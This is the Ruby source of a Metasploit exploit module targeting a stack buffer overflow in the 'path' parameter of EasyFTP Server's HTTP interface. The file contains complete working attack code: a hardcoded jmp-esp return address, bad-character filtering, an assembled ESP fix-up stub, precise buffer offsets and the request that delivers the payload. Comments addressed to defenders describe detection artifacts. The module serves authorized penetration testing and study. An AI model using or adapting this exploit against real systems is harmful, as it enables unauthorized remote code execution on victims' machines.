Path: blob/master/modules/exploits/windows/http/easyftp_list.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Stack-based buffer overflow in the 'path' query parameter of EasyFTP Server's
# HTTP interface (/list.html), affecting 1.7.0.11 and earlier per the module
# description. The overflow is reached over HTTP (HttpClient mixin), not FTP.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Server banner pattern consumed by the framework's HTTP fingerprinting;
  # `check` below relies on the same pattern. It identifies the product only,
  # not a version.
  HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and options.
  #
  # Defaults worth noting for defenders: RPORT 8080, and anonymous HTTP basic
  # credentials (the description states the server allows anonymous access by
  # default, so authentication is not a mitigating control here).
  #
  # @param info [Hash] metadata passed through to the framework
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'EasyFTP Server list.html path Stack Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
          and earlier. EasyFTP fails to check input size when parsing the 'path' parameter
          supplied to an HTTP GET request, which leads to a stack based buffer overflow.
          EasyFTP allows anonymous access by default; valid credentials are typically
          unnecessary to exploit this vulnerability.

          After version 1.7.0.12, this package was renamed "UplusFtp".

          Due to limited space, as well as difficulties using an egghunter, the use of
          staged, ORD, and/or shell payloads is recommended.
        },
        'Author' => [
          'ThE g0bL!N', # Original exploit [see References]
          'jduck' # Metasploit re-implementation
        ],
        'References' => [
          [ 'OSVDB', '66614'],
          [ 'EDB', '11500' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Privileged' => true,
        'Payload' => {
          # 256 bytes is the hard upper bound enforced in `exploit`.
          'Space' => 256,
          # Bytes that cannot survive URL/query-string handling on the way in.
          'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",
          'Compat' =>
          {
            'ConnectionType' => '+ws2ord',
          },
        },
        'Platform' => 'win',
        'Targets' => [
          [
            # A single, OS-specific target: the return address lives in a
            # system DLL, so this is not "universal" across Windows versions.
            'Windows XP SP3 - Easy FTP Server Universal',
            # NOTE: It's not possible to use addresses within the
            # binary due to the nul byte.
            {
              'Ret' => 0x7cc5d507 # jmp esp in shell32.dll
              # 'Ret' => 0xdeadbeef
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-02-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
        OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', '[email protected]'])
      ]
    )
  end

  # Banner-based detection only.
  #
  # Returns Detected when the HTTP fingerprint contains the Easy-Web Server
  # banner, otherwise Safe. Because the pattern carries no version, Safe means
  # "banner not observed", not "patched"; a matching banner on a version later
  # than 1.7.0.11 is reported as Detected as well.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    info = http_fingerprint # check method
    if info and (info =~ /Easy\-Web Server\//)
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  # Sends a single GET to /list.html with an oversized 'path' query parameter.
  #
  # Aborts via fail_with when the encoded payload exceeds the 256-byte space
  # declared above. The request is fire-and-forget: a 5 second timeout is used
  # and any response at all is treated as a sign the overflow did not take
  # (the vulnerable server is not expected to answer). The handler is started
  # regardless of the outcome.
  def exploit
    if (payload.encoded.length > payload_space)
      fail_with(Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")
    end

    # Fix up ESP, jmp to the beginning of the buffer
    stub_asm = %q{
      mov edi, esp
      add esp, 0xfffffc04
      add edi, 0xfffffee8
      jmp edi
    }
    stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string

    # Build the path up
    # Layout, in order: encoded payload, random padding to offset 268,
    # saved return address (target.ret), padding to 280, the ESP fix-up stub,
    # then padding out to a fixed 332-byte total. rand_text keeps the filler
    # non-constant between runs, which matters for signature-based detection.
    path = ''
    path << payload.encoded
    path << rand_text(268 - path.length)
    # NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.
    path << [target.ret].pack('V')
    path << rand_text(280 - path.length)
    path << stub
    path << rand_text(332 - path.length)

    # The whole buffer travels in the query string of a single GET; a request
    # for /list.html with a ~330-byte 'path' value is the observable artifact.
    uri = "/list.html?path="
    uri << path

    print_status("Trying target #{target.name}...")
    res = send_request_raw({ 'uri' => uri }, 5)

    # A response means the server survived the request; the body is echoed
    # verbatim to help diagnose which target/offset assumption failed.
    if (res)
      print_error("The server unexpectedly responded, this is not good.")
      print_status(res.to_s)
    end

    handler
  end
end